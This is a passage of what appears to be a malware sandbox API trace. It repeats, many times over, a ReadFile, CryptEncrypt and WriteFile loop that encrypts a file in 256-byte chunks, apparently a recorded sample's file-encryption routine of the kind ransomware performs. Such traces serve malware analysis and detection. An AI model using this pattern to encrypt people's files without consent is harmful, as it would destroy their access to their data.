CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.254] GetLastError () returned 0x0 [0172.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.254] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.254] GetLastError () returned 0x0 [0172.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.254] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.254] GetLastError () returned 0x0 [0172.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.254] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.254] GetLastError () returned 0x0 [0172.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.254] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.255] GetLastError () returned 0x0 [0172.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.255] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.255] GetLastError () returned 0x0 [0172.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.255] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.255] GetLastError () returned 0x0 [0172.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.255] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.255] GetLastError () returned 0x0 [0172.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.255] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.255] GetLastError () returned 0x0 [0172.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.255] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.255] GetLastError () returned 0x0 [0172.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.255] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.255] GetLastError () returned 0x0 [0172.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.256] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.256] GetLastError () returned 0x0 [0172.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.256] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.256] GetLastError () returned 0x0 [0172.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.256] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.256] GetLastError () returned 0x0 [0172.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.256] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.256] GetLastError () returned 0x0 [0172.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.256] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.256] GetLastError () returned 0x0 [0172.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.256] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.256] GetLastError () returned 0x0 [0172.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.257] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.257] GetLastError () returned 0x0 [0172.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.257] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.257] GetLastError () returned 0x0 [0172.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.257] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.257] GetLastError () returned 0x0 [0172.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.257] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.257] GetLastError () returned 0x0 [0172.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.257] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.257] GetLastError () returned 0x0 [0172.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.257] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.257] GetLastError () returned 0x0 [0172.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.257] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.257] GetLastError () returned 0x0 [0172.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.258] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.258] GetLastError () returned 0x0 [0172.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.258] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.258] GetLastError () returned 0x0 [0172.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.258] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.258] GetLastError () returned 0x0 [0172.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.258] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.258] GetLastError () returned 0x0 [0172.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.258] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.258] GetLastError () returned 0x0 [0172.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.258] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.258] GetLastError () returned 0x0 [0172.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.259] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.259] GetLastError () returned 0x0 [0172.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.259] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.259] GetLastError () returned 0x0 [0172.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, 